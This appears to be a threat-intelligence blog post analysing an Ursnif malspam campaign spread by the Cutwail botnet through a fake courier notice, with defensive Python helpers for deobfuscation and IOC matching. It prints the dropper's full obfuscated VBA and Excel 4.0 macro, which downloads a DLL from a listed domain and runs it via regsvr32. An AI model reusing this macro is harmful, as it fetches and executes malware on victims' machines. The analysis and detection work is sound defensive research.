
Emerging Threats

Ursnif/Cutwail Malware — June 2021

by frtg

We observed a new malspam campaign distributing Ursnif malware. The malware attachment presents itself as a counterfeit delivery notification from the courier Bartolini.

Email delivering the malware

The malicious attachment belongs to the Cutwail v2 botnet, operated by the threat actor NARWHAL SPIDER (reference).
Cutwail v2 is also known as 0bulk Psych Evolution R4.
Cutwail originated in 2007 and expanded through Pushdo, a malware that infected numerous Windows systems and enrolled them into the botnet.
Through 2020, Cutwail v2 primarily distributed malware including Dridex and Gozi, alongside phishing fraud schemes designed to harvest user credentials.

XLSM File

The email attachment contains an xlsm file (dropper).

Macro Details

Macros contained in the email attachment:

Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO Questa_cartella_di_lavoro.cls 
in file: xl/vbaProject.bin - OLE stream: 'VBA/Questa_cartella_di_lavoro'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Function testo_uno()

For Each di In Sheets(3).UsedRange.SpecialCells(xlCellTypeConstants): Pk = "-"
Hi = Split(di, Pk)
For Each X In Hi
nnv = nnv & Sheets(msoTabStopCenter).Range(X)
Next
Next
testo_uno = nnv
End Function

Function minusole(uu As String, ik As Integer)
Sheets(1).Cells(ik, 1).FormulaLocal = uu
End Function

Sub rempofo()
mII = 0: COsT = 0: Run ("casuale")
End Sub

Function revisio()
Sheets(1).Cells(6, 1).FormulaLocal = pago_i & nuove_d
End Function

Function nuove_d()
nuove_d = "T" & vnumeros & "O" & "()"
End Function

Function fare_E() As String
fare_E = "" & "Y"
End Function

Function pago_i()
pago_i = Guida_1 & "R" & "I"
End Function

Function v_promo() As Variant
v_promo = Split(testo_uno, "" & fare_E)
End Function

Function coSa() As String
coSa = "O"
End Function

Function pagina_P()
pagina_P = revisio
End Function

Sub Visualizzazioni()
Excel4MacroSheets.Add Before:=Worksheets(1): ActiveSheet.Visible = xlSheetHidden
riservata = pagina_P: Sheets(1).Cells(2, 1).Name = "casuale"
For Each xt In v_promo
dalla_legge = minusole(Guida_1 & xt, 2): rempofo
Next
End Sub

Function Guida_1()
Guida_1 = "="
End Function

Function bertranno()
bertranno = "" & "_i"
End Function

Function vnumeros() As String
vnumeros = coSa & "RN"
End Function
-------------------------------------------------------------------------------
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|Suspicious|Run                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings                    |
|Hex String|'\x00\x02\x08\x19'  |00020819                                     |
|Hex String|'\x00\x00\x00\x00\x0|000000000046                                 |
|          |0F'                 |                                             |
|Hex String|'\x00\x02\x08 '     |00020820                                     |
+----------+--------------------+---------------------------------------------+
NOME.RIF("KK";"er")
NOME.RIF("D";"\")
NOME.RIF("m";ARCCOS(-0,5)*135/PI.GRECO())
NOME.RIF("p";COS(RADIANTI(60))-COS(60*PI.GRECO()/180))
NOME.RIF("K";"w")
NOME.RIF("Z";"o")
SE(VAL.NUMERO(RICERCA(K;INFO.AREA.DI.LAVORO(1))); ;CHIUDE(VERO))
NOME.RIF("A";"C:"&D&CODICE.CARATT(CASUALE.TRA(65;m))&CODICE.CARATT(CASUALE.TRA(65;m))&CASUALE.TRA(100;999)&CODICE.CARATT(CASUALE.TRA(65;m)))
NOME.RIF("if";CODICE.CARATT(115))
NOME.RIF("B";A&D&CODICE.CARATT(CASUALE.TRA(65;m))&CODICE.CARATT(CASUALE.TRA(65;m))&CASUALE.TRA(100;999)&CODICE.CARATT(CASUALE.TRA(65;m)))
NOME.RIF("F";INFO.AREA.DI.LAVORO(13)&".")
NOME.RIF("U";"e")
RICHIAMA("K"&U&"rn"&U&"l32";"Cr"&U&"at"&U&"Direct"&Z&"ryA";"JCJ";A;p)
NOME.RIF("G";NOME.RIF("h";"i"))
RICHIAMA("K"&KK&"n"&U&"l32";"CreateDir"&U&"ct"&Z&"ryA";"JCJ";B;p)
NOME.RIF("S";"t")
RICHIAMA("URLMON";"URLD"&Z&"wnl"&Z&"adT"&Z&"FileA"; "JJCCJJ";p;RIMPIAZZA("hqps:"&INFO.AREA.DI.LAVORO(9)&INFO.AREA.DI.LAVORO(9)&"c"&Z&"nsul"&S&"a"&S&"y"&Z&"n"&DESTRA(F)&"c"&Z&"m";2;1;S&S);B&D&F;p;p)
ATTESA(ADESSO()+"00:00:09")
RICHIAMA("Sh"&U&"ll32";"Sh"&U&"llEx"&U&"cut"&U&"A"; "JJCCCCJ";p;"Op"&U&"n";"r"&U&"gsvr32";" -"&if&" "&B&D&F;p;p)
FILE.CHIUDI(FALSO)

The macro embedded in the document initiates a connection to the domain consultatyon[.]com to download a dll file containing the next stage of Ursnif. Our Cyber Threat Intelligence tracking identified this delivery pattern as consistent with T1566.001 (Phishing: Spearphishing Attachment) and T1204.002 (User Execution: Malicious File).
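The RICHIAMA (CALL) cells in the macro sheet above only show which Windows APIs are used once the values assigned with NOME.RIF are substituted into the "&" concatenations. The script below is an added analysis example written for this post; it is not code from the post or from the sample. It embeds the quoted formulas as a constructed input string, resolves string literals, defined names, CODICE.CARATT (CHAR) and the two arithmetic definitions, and deliberately leaves anything that depends on Excel runtime state (CASUALE.TRA/RANDBETWEEN, INFO.AREA.DI.LAVORO/GET.WORKSPACE, and the RIMPIAZZA/REPLACE expression built on them) as a placeholder rather than guessing it. All function and variable names in the script are my own.

```python
import math
import re

# Constructed input: the name-assignment (NOME.RIF) and CALL (RICHIAMA) cells quoted above.
SAMPLE_SHEET = r'''
NOME.RIF("KK";"er")
NOME.RIF("D";"\")
NOME.RIF("m";ARCCOS(-0,5)*135/PI.GRECO())
NOME.RIF("p";COS(RADIANTI(60))-COS(60*PI.GRECO()/180))
NOME.RIF("K";"w")
NOME.RIF("Z";"o")
NOME.RIF("A";"C:"&D&CODICE.CARATT(CASUALE.TRA(65;m))&CODICE.CARATT(CASUALE.TRA(65;m))&CASUALE.TRA(100;999)&CODICE.CARATT(CASUALE.TRA(65;m)))
NOME.RIF("if";CODICE.CARATT(115))
NOME.RIF("B";A&D&CODICE.CARATT(CASUALE.TRA(65;m))&CODICE.CARATT(CASUALE.TRA(65;m))&CASUALE.TRA(100;999)&CODICE.CARATT(CASUALE.TRA(65;m)))
NOME.RIF("F";INFO.AREA.DI.LAVORO(13)&".")
NOME.RIF("U";"e")
RICHIAMA("K"&U&"rn"&U&"l32";"Cr"&U&"at"&U&"Direct"&Z&"ryA";"JCJ";A;p)
RICHIAMA("K"&KK&"n"&U&"l32";"CreateDir"&U&"ct"&Z&"ryA";"JCJ";B;p)
NOME.RIF("S";"t")
RICHIAMA("URLMON";"URLD"&Z&"wnl"&Z&"adT"&Z&"FileA"; "JJCCJJ";p;RIMPIAZZA("hqps:"&INFO.AREA.DI.LAVORO(9)&INFO.AREA.DI.LAVORO(9)&"c"&Z&"nsul"&S&"a"&S&"y"&Z&"n"&DESTRA(F)&"c"&Z&"m";2;1;S&S);B&D&F;p;p)
RICHIAMA("Sh"&U&"ll32";"Sh"&U&"llEx"&U&"cut"&U&"A"; "JJCCCCJ";p;"Op"&U&"n";"r"&U&"gsvr32";" -"&if&" "&B&D&F;p;p)
'''

# Italian numeric worksheet functions the sheet uses, mapped onto Python's math module.
NUMERIC_FUNCS = {"ARCCOS": "acos", "COS": "cos", "RADIANTI": "radians", "PI.GRECO": "pi"}

def split_top_level(expr, sep):
    """Split expr on sep, ignoring separators inside quotes or parentheses."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append("".join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    parts.append("".join(cur).strip())
    return parts

def eval_numeric(expr):
    """Evaluate a purely arithmetic formula (decimal comma allowed); None if it is not one."""
    py = expr.replace(",", ".")
    for it_name, py_name in NUMERIC_FUNCS.items():
        py = py.replace(it_name, py_name)
    # Refuse anything that still references a defined name or a function we do not model.
    if not set(re.findall(r"[A-Za-z_][A-Za-z_.]*", py)) <= set(NUMERIC_FUNCS.values()):
        return None
    try:
        value = eval(py, {"__builtins__": {}}, {"acos": math.acos, "cos": math.cos, "radians": math.radians, "pi": lambda: math.pi})
    except (SyntaxError, NameError, TypeError, ValueError, ZeroDivisionError):
        return None
    return round(value, 9)   # absorb float noise so p resolves to 0 and m to 90

def resolve_expr(expr, names):
    """Resolve an '&' concatenation of literals, defined names, CHAR() calls and arithmetic."""
    out = []
    for term in split_top_level(expr, "&"):
        if len(term) >= 2 and term.startswith('"') and term.endswith('"'):
            out.append(term[1:-1])
        elif term in names:
            out.append(resolve_expr(names[term], names))
        elif (m := re.fullmatch(r"CODICE\.CARATT\((\d+)\)", term)):   # CHAR(n) with a literal n
            out.append(chr(int(m.group(1))))
        elif (num := eval_numeric(term)) is not None:
            out.append(str(int(num)) if num == int(num) else str(num))
        else:
            # Needs Excel runtime state (RANDBETWEEN, GET.WORKSPACE, REPLACE over them): keep a placeholder.
            out.append(f"<{term.split('(')[0]}(...)>" if "(" in term else f"<{term}>")
    return "".join(out)

def resolve_call(formula, names):
    """Return the resolved argument list of one RICHIAMA(...) (CALL) formula."""
    m = re.fullmatch(r"RICHIAMA\((.*)\)", formula.strip(), re.S)
    if not m:
        raise ValueError("not a RICHIAMA formula: " + formula)
    return [resolve_expr(arg, names) for arg in split_top_level(m.group(1), ";")]

def parse_sheet(text):
    """Collect name assignments and CALL formulas from a one-formula-per-line dump."""
    names, calls = {}, []
    for line in text.splitlines():
        line = line.strip()
        m = re.fullmatch(r'NOME\.RIF\("([^"]+)";(.*)\)', line)
        if m:
            names[m.group(1)] = m.group(2)
        elif line.startswith("RICHIAMA("):
            calls.append(line)
    return names, calls

def resolve_sample():
    """Resolve every CALL in SAMPLE_SHEET; each result is the list of its arguments."""
    names, calls = parse_sheet(SAMPLE_SHEET)
    return [resolve_call(c, names) for c in calls]
```

Calling resolve_sample() and joining each argument list with " | " gives one line per CALL, which is enough to read the sequence the sheet drives: Kernel32!CreateDirectoryA twice, URLMON!URLDownloadToFileA into the newly created directory, and Shell32!ShellExecuteA launching regsvr32 with " -s" and the downloaded file path. The m and p names resolve to the numbers 90 and 0, which is why CASUALE.TRA(65;m) yields a random uppercase letter for the directory name. The unresolved placeholders are the parts a detection engineer cannot predict statically and are exactly why the behavioural signal (Excel spawning regsvr32 from a freshly created path) is a better alert than any fixed string.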

Domain contacted for DLL download

DLL

  • md5 3896AEE936D55D53EFA5E0D1C2AB817D
  • sha1 589E3E955C870821277C7F2EA9F60BC37BBB7825
  • sha256 E53CAA0529020312A9092B409C2A38D6DDF0C3D2786832A514657CA617DF770F
  • first-bytes-hex 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00
  • imphash 33440A0287E1F3D8BFD56DD3109F1807
  • cpu 32-bit
Exports
  • Gasalways text:01019E40
  • Pitchnecessary text:0101A79B

Analysis of the dll permits identification of domains used for downloading the subsequent stage.

Malware addresses and domains

In the final stage, command and control (C2) server IP addresses and domains are identifiable.

C2 addresses

IOC

DLL

  • sha256 E53CAA0529020312A9092B409C2A38D6DDF0C3D2786832A514657CA617DF770F
Domains and IP Addresses

DLL:

  • consultatyon[.]com

Loader:

  • roudinoden[.]club
  • cloudinoren[.]club

C2:

  • 46.21.153[.]208
  • 46.21.153[.]209
  • 46.21.153[.]212
  • goudinoden[.]club
  • woudinoden[.]club
  • poudinoden[.]club
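To turn the indicators above into something a SOC can run against its own telemetry, here is an added Python example (my own code, not from the post). It refangs the published domains, IP addresses and SHA-256, matches them against DNS, proxy and firewall log lines, and looks a file's hash up in the IOC set. The log lines, their timestamps and the internal client addresses are constructed for the demonstration; the only file content used is the first-bytes-hex sequence listed above, so the hash check shows a miss on purpose while the MZ header check still identifies a PE.

```python
import hashlib
import re

# Indicators as published in the post, kept in their defanged form.
IOC_DOMAINS = ["consultatyon[.]com", "roudinoden[.]club", "cloudinoren[.]club",
               "goudinoden[.]club", "woudinoden[.]club", "poudinoden[.]club"]
IOC_IPS = ["46.21.153[.]208", "46.21.153[.]209", "46.21.153[.]212"]
IOC_SHA256 = {"e53caa0529020312a9092b409c2a38d6ddf0c3d2786832a514657ca617df770f": "Ursnif DLL"}

def refang(ioc):
    """Turn a defanged indicator ('[.]', 'hxxp') back into its matchable, lower-cased form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http").lower()

DOMAINS = {refang(d) for d in IOC_DOMAINS}
IPS = {refang(i) for i in IOC_IPS}

# Hostnames and dotted-quad addresses as they appear in key=value style log lines.
HOST_RE = re.compile(r"(?<![a-z0-9.-])[a-z0-9-]+(?:\.[a-z0-9-]+)+")
IP_RE = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")

def matches(line):
    """IOC domains and IPs referenced by one log line (case-insensitive; subdomains count)."""
    low = line.lower()
    hits = set()
    hits.update(ip for ip in IP_RE.findall(low) if ip in IPS)
    for host in HOST_RE.findall(low):
        hits.update(d for d in DOMAINS if host == d or host.endswith("." + d))
    return sorted(hits)

def scan_logs(lines):
    """Return (line index, matched indicators) for every line that touches an IOC."""
    return [(i, hit) for i, line in enumerate(lines) if (hit := matches(line))]

def classify_file(data):
    """SHA-256 lookup against the published hash, plus a cheap PE (MZ header) check."""
    digest = hashlib.sha256(data).hexdigest()
    return {"sha256": digest, "known_as": IOC_SHA256.get(digest), "is_pe": data[:2] == b"MZ"}

# Constructed sample log lines (timestamps, internal addresses and the benign query are invented).
SAMPLE_LOGS = [
    "2021-06-10T09:12:01Z dns client=10.0.4.22 query=consultatyon.com type=A",
    "2021-06-10T09:12:03Z proxy client=10.0.4.22 method=GET url=https://CONSULTATYON.com/ status=200",
    "2021-06-10T09:12:30Z dns client=10.0.4.22 query=cloudinoren.club type=A",
    "2021-06-10T09:13:02Z fw client=10.0.4.22 dst=46.21.153.212 dport=443 action=allow",
    "2021-06-10T09:14:00Z dns client=10.0.7.9 query=update.example.org type=A",
]

# Constructed file sample: only the first 33 bytes listed in the post, so the digest will not
# match the published SHA-256 of the full DLL, but the header is recognisably a PE.
SAMPLE_HEADER = bytes.fromhex("4D5A90000300000004000000FFFF0000B8000000000000004000000000000000" "00")

if __name__ == "__main__":
    for i, hit in scan_logs(SAMPLE_LOGS):
        print(f"line {i}: {', '.join(hit)}")
    print(classify_file(SAMPLE_HEADER))
```

The subdomain rule in matches() matters for the loader and C2 domains, which may be queried with arbitrary host labels in front; the lookbehind in HOST_RE keeps "notpoudinoden.club" from matching "poudinoden.club". Swap SAMPLE_LOGS for a file iterator to run the same check over real DNS or proxy exports.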